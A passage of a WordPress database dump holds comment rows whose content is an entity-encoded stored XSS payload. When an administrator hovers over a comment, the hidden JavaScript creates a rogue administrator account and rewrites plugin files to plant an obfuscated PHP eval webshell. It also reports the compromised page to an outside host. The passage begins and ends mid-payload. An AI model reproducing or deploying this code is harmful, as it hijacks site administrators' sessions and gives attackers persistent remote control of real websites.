0;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(150, 1, 'ter', 'pzsgkgynel@gmail.com', 'http://www.facebook.com/pwaaaonte4g', '45.55.138.250', '2015-11-12 00:17:46', '2015-11-12 00:17:46', 'Hi nice ar Asyn<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#10